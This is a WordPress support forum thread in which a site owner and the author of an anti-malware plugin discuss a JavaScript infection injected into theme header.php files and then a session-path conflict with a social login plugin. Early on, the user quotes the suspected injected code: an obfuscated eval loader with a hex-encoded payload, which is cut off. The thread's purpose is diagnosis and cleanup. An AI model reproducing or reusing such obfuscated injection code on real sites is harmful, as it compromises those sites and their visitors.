WordPress.org

Support

Support » Plugins and Hacks » Anti-Malware Security and Brute-Force Firewall » [Resolved] some virus block me to access the site

[Resolved] some virus block me to access the site

Viewing 15 replies - 1 through 15 (of 17 total)
  • Plugin Author Eli

    @scheeeli

    This looks like a new threat that is not in my definitions yet. I you would be willing to give me WP Admin access to one of your infected sites I will find this new threat and add it to my definition update so that it can be automatically removed.

    You can email the login in directly to me: eli at gotmls dot net

    Aloha, Eli

    i just solve it with very traditional way, i download every folder from ftp to my desktop and my pc antivirus do detecting job …

    base on my desktop antivirus :
    virus name : JS/Expack.CM.3
    injected in all my theme header.php files,
    hopefully i really solve it, u still need access to take a lot ?
    thanks

    suspected code provide by google webmaster :

    <script type="text/javascript" language="javascript" >
    
    ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}i
    f(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa
    -02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_3
    1_28_83_15_12_28_7e_69_7a_28_7c_7a_6c_79_7a_28_45_28_6c_77_6
    b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_3
    0_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7c_7a_6c_79_7
    a_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_6a_69_36_7
    2_78_37_78_70_77_7c_77_37_7c_7a_69_6e_36_78_70_78_2f_43_15_1
    2_28_7c_7a_6c_79_7a_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_7
    7_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_7c_7
    a_6c_79_7a_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2
    f_38_2f_43_15_12_28_7c_7a_6c_79_7a_36_7b_7c_81_74_6d_36_70_6

    or u can visit here for detail in their cache system :
    http://sitecheck.sucuri.net/results/douglasyeap.pgpropertyagent.com/
    the main site already rescan without issue now ..

    Plugin Author Eli

    @scheeeli

    I would still like access to an infected site so I can see the infection in-place and test my own removal code. If you don’t have a site I can login to can you send me one of your infected hearder.php files?

    i don’t have the files anymore (cause my pc block it).

    I add and create you as my site admin now, remember my site is wpms 🙂
    account created 🙂

    email you ftp access too 🙂

    Plugin Author Eli

    @scheeeli

    Thanks for the access but it looks like you have already cleaned the infection out of your header. Do you have any sites that are still infected with this threat?

    unfortunately no (lucky me) …
    I think the problem should be on scanning not db, cause i recall your scanner detect the virus but only one files header.php (i have 4 header.php), but that header.php detect is the only theme that not using at all ….

    Plugin Author Eli

    @scheeeli

    Thanks for working with me on this and giving me access to your site. Based on the malicious code snippet you posted, and the files in your quarantine, I do think this malware is in my definitions already.

    Please keep a close eye on your site for a few days to make sure the infection does not come back. If you do get re-infected, and hope you don’t, but if you do, please let me know right away and I will look for the source of the infection too.

    Aloha, Eli

    seem like you plugin is conflict with wp social login.
    i try diagnose and think this is the issue :
    cookie save here /public_html/wp-content/plugins/gotmls/images/

    Plugin Author Eli

    @scheeeli

    WordPress does not handle sessions well, and some servers I’ve found don’t even have a session path, so I have added this to the top of my gotmls/images/index.php file in my plugin:
    if(!session_save_path()) session_save_path(dirname(__FILE__).'/');

    If this line is infact causing an issue I will have to look for another way to fix the no-session issue. Can you rem out that line and let me know if it solves the issue?

    Also, what are the symptoms you are experiencing due to this conflict?

    symptoms :
    when click on social login, new screen pop up -> redirect to this page : http://pgpropertyagent.com/wp-content/plugins/wordpress-social-login/hybridauth/?hauth.start=Live&hauth.time=1374262225
    with your plugin -> You cannot access this page directly.
    without your plugin -> redirect to social network API or login page.

    below is my website info with and without your plugin :
    without (different part) :

    SESSION:                  Enabled
    SESSION:WSL               WordPress Social Login 2.1.4
    SESSION:NAME:             PHPSESSID
    
    COOKIE PATH:              /
    SAVE PATH:
    USE COOKIES:              On
    USE ONLY COOKIES:         Off

    with your plugin :

    SESSION:                  Enabled
    SESSION:WSL               WordPress Social Login 2.1.4
    SESSION:NAME:             PHPSESSID
    
    COOKIE PATH:              /
    SAVE PATH:                /home/xxx/domains/domain.com/public_html/wp-content/plugins/gotmls/images/
    USE COOKIES:              On
    USE ONLY COOKIES:         Off

    hope this help ..

    Plugin Author Eli

    @scheeeli

    That message is from /public_html/wp-content/plugins/wordpress-social-login/hybridauth/Hybrid/Endpoint.php

    I was getting that error “You cannot access this page directly” with or without my plugin enabled. I tried remming out that first line of my plugin that changes the session path and nothing seems any different.

    Can you show me a working redirect without my plugin enabled so that I can see the difference?

    u can visit my site, i just try, is working now 🙂

    Plugin Author Eli

    @scheeeli

    When I go to:
    http://pgpropertyagent.com/wp-content/plugins/wordpress-social-login/hybridauth/?hauth.start=Live&hauth.time=1374262225
    I still get:
    “You cannot access this page directly.”

    What URL can I use to see it working like you see it?

Viewing 15 replies - 1 through 15 (of 17 total)
  • The topic ‘[Resolved] some virus block me to access the site’ is closed to new replies.
Skip to toolbar